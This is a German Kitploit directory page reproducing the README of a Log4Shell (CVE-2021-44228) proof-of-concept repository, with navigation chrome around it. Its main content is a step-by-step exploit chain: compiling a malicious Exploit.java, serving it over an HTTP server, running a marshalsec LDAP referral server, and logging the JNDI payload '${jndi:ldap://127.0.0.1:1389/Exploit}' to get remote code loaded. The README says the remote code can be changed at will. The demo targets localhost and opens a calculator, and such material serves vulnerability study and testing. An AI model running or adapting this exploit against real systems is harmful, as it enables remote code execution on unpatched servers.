Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/coldfusionx/cve-2021-44228-log4shell-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubcoldfusionx/cve-2021-44228-log4shell-poc

CVE-2021-44228-Log4Shell-POC

Proof-of-Concept für Log4Shell (CVE-2021-44228), das die JNDI-basierte Remote-Codeausführung über LDAP- und HTTP-Server demonstriert.

Repository anzeigen
213vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-44228-Log4Shell-POC

Vollständiger POC für die berüchtigte Log4j-Schwachstelle CVE-2021-44228

Voraussetzungen

  • Laden Sie Java von hier herunter und installieren Sie es. Sie können jdk-8u181 verwenden.
  • Installieren Sie IntelliJ Idea von hier

POC

  • Schritt 1 : Klonen Sie dieses Repository.
  • Schritt 2 : Verschieben Sie die Datei Exploit.java in einen anderen Ordner. In meinem Fall habe ich einen Ordner rce im Home-Verzeichnis erstellt. /home/coldfusionx/rce

mov

  • Schritt 3 : Ein Blick auf Exploit.java Hier können Sie den Remote-Code nach Belieben ändern. In diesem Fall würde auf einer Ubuntu-Maschine gnome-calculator geöffnet.

exp

  • Schritt 4 : Als Nächstes müssen wir Exploit.java mit dem Befehl javac Exploit.java kompilieren. Nach erfolgreicher Kompilierung sollte eine neue Datei Exploit.class erstellt werden.

com

  • Schritt 5 : Starten Sie einen Python-HTTP-Server, um Exploit.class mit python3 -m http.server 8888 zu hosten. Alternativ können Sie auch einen PHP-Server mit dem Befehl php -S 127.0.0.1:8888 verwenden.

sv

  • Schritt 6 : Laden Sie die Projektdateien in IntelliJ Idea und lassen Sie Maven die Dateiindizierung abschließen. Nach Abschluss sollte Ihr Projekt wie folgt aussehen:

poc1

  • Schritt 7 : Zum Ausführen des Projekts müssen wir eine Konfiguration erstellen. Klicken Sie auf Add Configuration

poc2

root@kitploit:~
1. Wählen Sie `Application`

poc3

root@kitploit:~
2. Wählen Sie die Hauptklasse

main

root@kitploit:~
3. Wählen Sie das JDK aus und übernehmen Sie die Einstellungen.

poc4

root@kitploit:~
4. Sie sollten sehen, dass die Log4j-Anwendung erstellt wurde und bereit zum Ausführen ist.

poc5

  • Schritt 8 : Als Nächstes starten wir den LDAPRefServer mit marshalsec:
  • cd marshasec
  • Führen Sie java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit" aus, um den LDAP-Server zu starten. Hier ist 127.0.0.1:8888 der Python-Server, der Exploit.class hostet, daher geben wir /#Exploit an.

ldap

  • Schritt 9 : Bearbeiten Sie die JNDI-Payload in log4j.java nach Ihren Anforderungen: logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}"); In diesem Fall laden wir die Remote-Klasse Exploit. Der LDAP-Referrer-Server leitet die Anfrage an unseren Python-Server weiter, der die schädliche Exploit-Klasse hostet.

  • Schritt 10 : Führen Sie Log4j aus. Bei erfolgreicher Ausführung sollte ein Gnome-Rechner erscheinen.

rce

Schauen Sie sich meine detaillierte Analyse zu Log4Shell CVE-2021-44228 an

Referenz

  • https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Tool herunterladen